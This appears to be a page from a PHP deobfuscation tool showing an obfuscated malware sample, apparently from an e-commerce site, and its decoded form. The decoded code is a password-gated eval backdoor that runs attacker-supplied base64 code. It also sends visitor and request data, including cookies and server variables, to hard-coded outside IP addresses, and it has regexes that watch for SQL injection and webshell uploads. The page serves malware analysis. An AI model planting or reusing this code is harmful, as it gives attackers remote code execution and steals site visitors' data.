Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $td7="2umWaYcnsizQJgCpokxf5GtjhDBV_XAMqrOUL1P73Fvd8SRlZ4eEKyHwN69bT0I";$l52=$td7[19]..

Decoded Output download

if 
(isset
	(	$_POST[product_id])  && md5($_POST[product_id])==="7624e600e055e1676a7a0728f0051c69"  )	{eval(	base64_decode($_POST[image_id])
 );	exit();	};

$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['prod_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
        unset($_POST['prod_hash']);
        $_POST = array_values($_POST);
    }
}

$q=[
	"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
	"#select.+into.+\@.+\;.+prepare.+\@#is",
	"#insert.+into.+values#is",
	"#update.+set.+where.+\=#is",
	"#\<\?php#is",
	"#file_put_contents[\( 	]+#is",
	"#select.+sleep\(.+\)#is",
];


$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);

foreach($q as $u){
	if(PREg_MaTch($u,$l)){



		$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
	    foreach ($ar as $v){
	        $array = array(
	                        'product'   => base64_encode($ff),
	                    );
	        $ch = curl_init(base64_decode($v));
	        curl_setopt($ch, CURLOPT_POST, 1);
	        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
	        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        curl_setopt($ch, CURLOPT_HEADER, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        $html = curl_exec($ch);
	        curl_close($ch);
	    }
		$_REQUEST = array();
		$_GET = array();
		$_POST = array();
		$_COOKIE = array();
	}
}

Did this file decode correctly?

Original Code

<?php $td7="2umWaYcnsizQJgCpokxf5GtjhDBV_XAMqrOUL1P73Fvd8SRlZ4eEKyHwN69bT0I";$l52=$td7[19].$td7[1].$td7[7].$td7[6].$td7[22].$td7[9].$td7[16].$td7[7].$td7[28].$td7[50].$td7[18].$td7[9].$td7[8].$td7[22].$td7[8];$s70=$td7[6].$td7[33].$td7[50].$td7[4].$td7[22].$td7[50].$td7[28].$td7[19].$td7[1].$td7[7].$td7[6].$td7[22].$td7[9].$td7[16].$td7[7];$ec0bc=$td7[59].$td7[4].$td7[8].$td7[50].$td7[57].$td7[49].$td7[28].$td7[43].$td7[50].$td7[6].$td7[16].$td7[43].$td7[50];if(@$l52($s70)){$c6697 = @$s70('', @$ec0bc('aWYgCihpc3NldAoJKAkkX1BPU1RbcHJvZHVjdF9pZF0pICAmJiBtZDUoJF9QT1NUW3Byb2R1Y3RfaWRdKT09PSI3NjI0ZTYwMGUwNTVlMTY3NmE3YTA3MjhmMDA1MWM2OSIgICkJe2V2YWwoCWJhc2U2NF9kZWNvZGUoJF9QT1NUW2ltYWdlX2lkXSkKICk7CWV4aXQoKTsJfTsKCiRhcj1bImFIUjBjSE02THk4eE1EWXVNVFV1TVRjNUxqSTFOUT09IiwiYUhSMGNITTZMeTh4TURNdU1UTTVMakV4TXk0eE5BPT0iLCJhSFIwY0hNNkx5ODBOeTR4TURFdU1UazFMams0Il07CmlmKGlzc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pKXsKICAgIGZvcmVhY2ggKCRhciBhcyAkdil7CiAgICAgICAgJGFycmF5ID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICdzdGF0aXN0aWNzX2hhc2gnICAgPT4gJF9QT1NUWydwcm9kX2hhc2gnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ3VhJyA9PiAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sCiAgICAgICAgICAgICAgICAgICAgICAgICdjbF9pcCcgPT4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10KCiAgICAgICAgICAgICAgICAgICAgKTsKICAgICAgICAkY2ggPSBjdXJsX2luaXQoYmFzZTY0X2RlY29kZSgkdikpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKICAgICAgICAkaHRtbCA9IGN1cmxfZXhlYygkY2gpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICB1bnNldCgkX1BPU1RbJ3Byb2RfaGFzaCddKTsKICAgICAgICAkX1BPU1QgPSBhcnJheV92YWx1ZXMoJF9QT1NUKTsKICAgIH0KfQoKJHE9WwoJIiMoc2VsZWN0fGluc2VydHx1cGRhdGUpLis/ZnJvbS4rPyhlbXBsb3llZXxhZG1pbl91c2VyfG9jX3VzZXIpI2lzIiwKCSIjc2VsZWN0LitpbnRvLitcQC4rXDsuK3ByZXBhcmUuK1xAI2lzIiwKCSIjaW5zZXJ0LitpbnRvLit2YWx1ZXMjaXMiLAoJIiN1cGRhdGUuK3NldC4rd2hlcmUuK1w9I2lzIiwKCSIjXDxcP3BocCNpcyIsCgkiI2ZpbGVfcHV0X2NvbnRlbnRzW1woIFx0XSsjaXMiLAoJIiNzZWxlY3QuK3NsZWVwXCguK1wpI2lzIiwKXTsKCgokZj1qc29uX2VuY29kZSgkX1JFUVVFU1QpLmpzb25fZW5jb2RlKCRfRklMRVMpLmpzb25fZW5jb2RlKCRfQ09PS0lFKTsKJGZmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9TRVJWRVIpLmpzb25fZW5jb2RlKCRfRklMRVMpLmpzb25fZW5jb2RlKCRfQ09PS0lFKTsKJGw9c3RydG9sb3dlcigkZik7Cgpmb3JlYWNoKCRxIGFzICR1KXsKCWlmKFBSRWdfTWFUY2goJHUsJGwpKXsKCgoKCQkkYXI9WyJhSFIwY0hNNkx5ODBOeTR4TURFdU1UazFMams0Il07CgkgICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKCSAgICAgICAgJGFycmF5ID0gYXJyYXkoCgkgICAgICAgICAgICAgICAgICAgICAgICAncHJvZHVjdCcgICA9PiBiYXNlNjRfZW5jb2RlKCRmZiksCgkgICAgICAgICAgICAgICAgICAgICk7CgkgICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAwKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwoJICAgICAgICAkaHRtbCA9IGN1cmxfZXhlYygkY2gpOwoJICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7CgkgICAgfQoJCSRfUkVRVUVTVCA9IGFycmF5KCk7CgkJJF9HRVQgPSBhcnJheSgpOwoJCSRfUE9TVCA9IGFycmF5KCk7CgkJJF9DT09LSUUgPSBhcnJheSgpOwoJfQp9'));@$c6697();}

Function Calls

base64_decode	1
create_function	1
function_exists	1

Variables

$l52	function_exists
$s70	create_function
$td7	2umWaYcnsizQJgCpokxf5GtjhDBV_XAMqrOUL1P73Fvd8SRlZ4eEKyHwN69b..
$ec0bc	base64_decode

Stats

MD5	28c36462be304ea4cc6c5399d723ea24
Eval Count	1
Decode Time	354 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats